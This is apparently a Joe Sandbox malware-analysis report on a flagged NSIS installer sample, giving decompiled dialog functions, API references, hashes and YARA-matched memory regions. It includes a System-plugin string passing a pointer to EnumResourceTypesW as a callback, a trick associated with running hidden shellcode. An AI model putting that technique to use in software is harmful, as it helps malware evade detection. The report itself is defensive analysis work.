                                                    • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                    • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 004054B0 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E004054B0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429224;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405444, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406234(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423728;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42920c == _t156) {
							ShowWindow( *0x42a248, 8);
							if( *0x42a2cc == _t156) {
								E00405371( *((intOrPtr*)( *0x422700 + 0x34)), _t156);
							}
							E004042AF(_t171);
							goto L25;
						}
						 *0x421ef8 = 2;
						E004042AF(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040433D(_a8, _a12, _a16);
						}
						ShowWindow( *0x429210, _t156);
						ShowWindow(_t169, 8);
						E0040430B(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a250;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429210 = GetDlgItem(_a4, 0x403);
				 *0x429208 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429224 = _t134;
				_v8 = _t134;
				E0040430B( *0x429210);
				 *0x429214 = E00404C0E(4);
				 *0x42922c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D6(_a4);
				if(( *0x42a258 & 0x00000003) != 0) {
					ShowWindow( *0x429210, _t156);
					if(( *0x42a258 & 0x00000002) != 0) {
						 *0x429210 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040430B( *0x429208);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a258 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                                                    0x004054b8
                                                    0x004054be
                                                    0x004054c8
                                                    0x004054cb
                                                    0x00405661
                                                    0x00405685
                                                    0x00405685
                                                    0x00405698
                                                    0x004056b6
                                                    0x004056b8
                                                    0x004056c0
                                                    0x00405716
                                                    0x0040571a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040571c
                                                    0x00405722
                                                    0x00000000
                                                    0x00000000
                                                    0x0040572c
                                                    0x00405734
                                                    0x00405737
                                                    0x00405839
                                                    0x00000000
                                                    0x00405839
                                                    0x00405746
                                                    0x00405751
                                                    0x0040575a
                                                    0x00405765
                                                    0x00405768
                                                    0x00405771
                                                    0x00405777
                                                    0x0040577a
                                                    0x0040577a
                                                    0x00405792
                                                    0x0040579b
                                                    0x0040579e
                                                    0x004057a5
                                                    0x004057ac
                                                    0x004057b4
                                                    0x004057b4
                                                    0x004057cb
                                                    0x004057cb
                                                    0x004057d2
                                                    0x004057d8
                                                    0x004057e4
                                                    0x004057eb
                                                    0x004057f4
                                                    0x004057f6
                                                    0x004057f9
                                                    0x00405808
                                                    0x0040580b
                                                    0x00405811
                                                    0x00405812
                                                    0x00405818
                                                    0x00405819
                                                    0x0040581a
                                                    0x00405822
                                                    0x0040582d
                                                    0x00405833
                                                    0x00405833
                                                    0x00000000
                                                    0x00405792
                                                    0x004056c8
                                                    0x004056f8
                                                    0x00405700
                                                    0x0040570b
                                                    0x0040570b
                                                    0x00405711
                                                    0x00000000
                                                    0x00405711
                                                    0x004056cc
                                                    0x004056d6
                                                    0x00000000
                                                    0x0040569a
                                                    0x004056a0
                                                    0x004056db
                                                    0x00000000
                                                    0x004056e4
                                                    0x004056a9
                                                    0x004056ae
                                                    0x004056b1
                                                    0x00000000
                                                    0x004056b1
                                                    0x00405698
                                                    0x004054d1
                                                    0x004054d5
                                                    0x004054dd
                                                    0x004054e1
                                                    0x004054e4
                                                    0x004054e7
                                                    0x004054ea
                                                    0x004054ed
                                                    0x004054ee
                                                    0x004054ef
                                                    0x00405508
                                                    0x0040550b
                                                    0x00405515
                                                    0x00405524
                                                    0x0040552c
                                                    0x00405534
                                                    0x00405539
                                                    0x0040553c
                                                    0x00405548
                                                    0x00405551
                                                    0x0040555a
                                                    0x0040557c
                                                    0x00405582
                                                    0x00405593
                                                    0x00405598
                                                    0x004055a6
                                                    0x004055b4
                                                    0x004055b4
                                                    0x004055b9
                                                    0x004055c7
                                                    0x004055c7
                                                    0x004055cc
                                                    0x004055cf
                                                    0x004055d4
                                                    0x004055e0
                                                    0x004055e9
                                                    0x004055f6
                                                    0x00405605
                                                    0x004055f8
                                                    0x004055fd
                                                    0x004055fd
                                                    0x00405611
                                                    0x00405611
                                                    0x00405625
                                                    0x0040562e
                                                    0x00405637
                                                    0x00405647
                                                    0x00405653
                                                    0x00405653
                                                    0x00000000

                                                    APIs
                                                    • GetDlgItem.USER32(?,00000403), ref: 0040550E
                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040551D
                                                    • GetClientRect.USER32(?,?), ref: 0040555A
                                                    • GetSystemMetrics.USER32(00000002), ref: 00405561
                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
                                                    • ShowWindow.USER32(?,00000008), ref: 004055FD
                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040561E
                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040552C
                                                      • Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405670
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005444,00000000), ref: 0040567E
                                                    • CloseHandle.KERNEL32(00000000), ref: 00405685
                                                    • ShowWindow.USER32(00000000), ref: 004056A9
                                                    • ShowWindow.USER32(?,00000008), ref: 004056AE
                                                    • ShowWindow.USER32(00000008), ref: 004056F8
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
                                                    • CreatePopupMenu.USER32 ref: 0040573D
                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
                                                    • GetWindowRect.USER32(?,?), ref: 00405771
                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
                                                    • OpenClipboard.USER32(00000000), ref: 004057D2
                                                    • EmptyClipboard.USER32 ref: 004057D8
                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
                                                    • GlobalLock.KERNEL32(00000000), ref: 004057EE
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405822
                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
                                                    • CloseClipboard.USER32 ref: 00405833
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                    • String ID: (7B${
                                                    • API String ID: 590372296-525222780
                                                    • Opcode ID: 4168f7cda2461ab29a413577240e25eb98403622908524b228d767f220b0f951
                                                    • Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
                                                    • Opcode Fuzzy Hash: 4168f7cda2461ab29a413577240e25eb98403622908524b228d767f220b0f951
                                                    • Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404771 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00404771(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422700;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040593B(0x3fb, _t146);
					E004064A6(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040593B(0x3fb, _t146);
							if(E00405CCE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406212(0x4216f8, _t146);
							_t87 = E004065EC(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406212(0x4216f8, _t146);
								_t89 = E00405C71(0x4216f8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216f8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C12(0x4216f8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216f8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404C0E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
									E00404BF6(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216e8);
									} else {
										E00404B2D(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004042F8(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423718 == _t158) {
									E00404706();
								}
								 *0x423718 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423728;
							_v60 = E00404AC7;
							_v56 = _t146;
							_v68 = E00406234(_t146, 0x423728, _t167, 0x421f00, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a250 + 0x11c));
								if( *((intOrPtr*)( *0x42a250 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93") {
									E00406234(_t146, 0x423728, _t167, 0, _t125);
									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
										lstrcatW(_t146, 0x4281e0);
									}
								}
								 *0x423718 =  *0x423718 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405C3D(_t146) != 0 && E00405C71(_t146) == 0) {
						E00405BC6(_t146);
					}
					 *0x429218 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D6(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D6(_t167);
					E0040430B(_t166);
					_t138 = E004065EC(6);
					if(_t138 == 0) {
						L53:
						return E0040433D(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}













































                                                    0x00404771
                                                    0x00404777
                                                    0x0040477d
                                                    0x0040478a
                                                    0x00404798
                                                    0x0040479b
                                                    0x004047a3
                                                    0x004047a9
                                                    0x004047a9
                                                    0x004047b5
                                                    0x004047b8
                                                    0x00404826
                                                    0x0040482d
                                                    0x00404904
                                                    0x0040490b
                                                    0x0040491a
                                                    0x0040491a
                                                    0x0040491e
                                                    0x00404928
                                                    0x00404935
                                                    0x00404937
                                                    0x00404937
                                                    0x00404945
                                                    0x0040494c
                                                    0x00404953
                                                    0x00404956
                                                    0x00404992
                                                    0x00404994
                                                    0x0040499a
                                                    0x0040499f
                                                    0x004049a3
                                                    0x004049a5
                                                    0x004049a5
                                                    0x004049c1
                                                    0x00000000
                                                    0x004049c3
                                                    0x004049c6
                                                    0x004049d4
                                                    0x004049da
                                                    0x004049db
                                                    0x004049de
                                                    0x004049e1
                                                    0x00000000
                                                    0x004049e1
                                                    0x00404958
                                                    0x0040495a
                                                    0x0040495e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00404960
                                                    0x00404960
                                                    0x0040496d
                                                    0x00404972
                                                    0x00000000
                                                    0x00000000
                                                    0x00404976
                                                    0x00404978
                                                    0x00404978
                                                    0x00404981
                                                    0x00404983
                                                    0x00404988
                                                    0x0040498b
                                                    0x00404990
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00404990
                                                    0x004049ed
                                                    0x004049f7
                                                    0x004049fa
                                                    0x004049fd
                                                    0x00404a04
                                                    0x00404a04
                                                    0x00404a06
                                                    0x00404a06
                                                    0x00404a0b
                                                    0x00404a0d
                                                    0x00404a15
                                                    0x00404a1c
                                                    0x00404a1e
                                                    0x00404a29
                                                    0x00404a29
                                                    0x00404a1e
                                                    0x00404a39
                                                    0x00404a43
                                                    0x00404a4b
                                                    0x00404a66
                                                    0x00404a4d
                                                    0x00404a56
                                                    0x00404a56
                                                    0x00404a4b
                                                    0x00404a6b
                                                    0x00404a70
                                                    0x00404a75
                                                    0x00404a7e
                                                    0x00404a7e
                                                    0x00404a87
                                                    0x00404a89
                                                    0x00404a89
                                                    0x00404a95
                                                    0x00404a9d
                                                    0x00404aa7
                                                    0x00404aa7
                                                    0x00404aac
                                                    0x00000000
                                                    0x00404aac
                                                    0x00404956
                                                    0x0040490d
                                                    0x00404914
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00404914
                                                    0x00404833
                                                    0x0040483c
                                                    0x00404856
                                                    0x0040485b
                                                    0x00404865
                                                    0x0040486c
                                                    0x00404878
                                                    0x0040487b
                                                    0x0040487e
                                                    0x00404885
                                                    0x0040488d
                                                    0x00404890
                                                    0x00404894
                                                    0x0040489b
                                                    0x004048a3
                                                    0x004048fd
                                                    0x004048a5
                                                    0x004048a6
                                                    0x004048ad
                                                    0x004048b7
                                                    0x004048bf
                                                    0x004048cc
                                                    0x004048e0
                                                    0x004048e4
                                                    0x004048e4
                                                    0x004048e0
                                                    0x004048e9
                                                    0x004048f6
                                                    0x004048f6
                                                    0x004048a3
                                                    0x00000000
                                                    0x0040485b
                                                    0x00404849
                                                    0x00000000
                                                    0x00000000
                                                    0x0040484f
                                                    0x00000000
                                                    0x004047ba
                                                    0x004047c7
                                                    0x004047d0
                                                    0x004047dd
                                                    0x004047dd
                                                    0x004047e4
                                                    0x004047ea
                                                    0x004047f3
                                                    0x004047f6
                                                    0x004047f9
                                                    0x00404801
                                                    0x00404804
                                                    0x00404807
                                                    0x0040480d
                                                    0x00404814
                                                    0x0040481b
                                                    0x00404ab2
                                                    0x00404ac4
                                                    0x00404821
                                                    0x00404824
                                                    0x00000000
                                                    0x00404824
                                                    0x0040481b

                                                    APIs
                                                    • GetDlgItem.USER32(?,000003FB), ref: 004047C0
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004047EA
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
                                                    • CoTaskMemFree.OLE32(00000000), ref: 004048A6
                                                    • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004048D8
                                                    • lstrcatW.KERNEL32(?,Call), ref: 004048E4
                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
                                                      • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
                                                      • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75F23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                      • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                      • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,75F23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                      • Part of subcall function 004064A6: CharPrevW.USER32(?,?,75F23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                    • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
                                                      • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                      • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
                                                      • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: (7B$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                    • API String ID: 2624150263-1043970390
                                                    • Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                    • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
                                                    • Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                    • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03344256 Relevance: 8.1, Strings: 6, Instructions: 572COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2=B$bVZ$gvc$ik$tAQ$Iqq
                                                    • API String ID: 0-3488922658
                                                    • Opcode ID: b1005774f853ddabdf14ae14ca532a4c37354e396689bc07a3db603358733d54
                                                    • Instruction ID: 660f345567fc3b932f0c7c466050128c81e0ceae41edc7837b9629941262bf2d
                                                    • Opcode Fuzzy Hash: b1005774f853ddabdf14ae14ca532a4c37354e396689bc07a3db603358733d54
                                                    • Instruction Fuzzy Hash: 29E16C6217DB780FE61C9B389CD65BE738AFB82221764D26FD143D64D7F822684301A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03343BF1 Relevance: 5.5, Strings: 4, Instructions: 512COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CW <$F7X$^SG$h;~
                                                    • API String ID: 0-3312901500
                                                    • Opcode ID: 4cd6ae5315323dd09627fcfe007f041e345c2a5ba7e76f1bc9cdadd765926f4e
                                                    • Instruction ID: 4f44e38ee94e3d45571038341efc7c27195f1586bcd24e6432cb2a195dcedbc5
                                                    • Opcode Fuzzy Hash: 4cd6ae5315323dd09627fcfe007f041e345c2a5ba7e76f1bc9cdadd765926f4e
                                                    • Instruction Fuzzy Hash: C9B1282322DA681EB11CEA3CECDE9FB52CFE697135361946FE183C715BE471685301A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E00402104() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x50)) = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x38)) = E00402C53(0xffffffdf);
